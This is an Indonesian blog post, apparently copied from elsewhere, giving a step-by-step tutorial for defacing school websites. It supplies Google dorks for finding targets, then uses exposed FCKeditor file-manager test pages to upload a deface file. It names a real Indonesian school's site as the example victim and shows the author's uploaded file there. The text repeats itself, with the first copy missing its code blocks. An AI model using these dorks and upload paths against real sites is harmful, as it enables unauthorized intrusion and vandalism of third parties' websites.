setelah lama HN down
saya mendapatkan sedikit tutorial dari keliling keliling saya kerumah mbah google ,
langsung saja ya , tak usah banyak pikir panjang lagi , ni dia
Pertama , Kita Cari Target digoogle dengan memasukan dork diatas .
tersera kalian mau coba dork yg mana .
kemudian pilih salah satu site dari google tadi :
Langkah selanjutnya , kita masukan Exploit di Target Tersebut :
sekarang , setelah masuk
Ganti Connector ASP → PHP
Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa
setelah upload , dimana tempatnya file kita tadi ?
itu mudah , langsung saja masukan
dan ini hasil saya tadi
sekian copasan saya , silakan berexplorasi sendiri ya
saya mendapatkan sedikit tutorial dari keliling keliling saya kerumah mbah google ,
langsung saja ya , tak usah banyak pikir panjang lagi , ni dia
Code:
[#] Exploit :
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.htmlCode:
[#]Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?Pertama , Kita Cari Target digoogle dengan memasukan dork diatas .
tersera kalian mau coba dork yg mana .
kemudian pilih salah satu site dari google tadi :
Code:
Example : http://www.smkmuh7gdl-malang.sch.idLangkah selanjutnya , kita masukan Exploit di Target Tersebut :
Code:
Example : http://www.smkmuh7gdl-malang.sch.id/editor/filemanager/connectors/test.htmlsekarang , setelah masuk
Ganti Connector ASP → PHP
Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa
setelah upload , dimana tempatnya file kita tadi ?
itu mudah , langsung saja masukan
PHP Code:
http://public_html/userfiles/file/file-deface.txthttp://public_html/userfiles/file-deface.txt dan ini hasil saya tadi
Code:
http://www.smkmuh7gdl-malang.sch.id/userfiles/file/test.txtsekian copasan saya , silakan berexplorasi sendiri ya
0 comments:
Post a Comment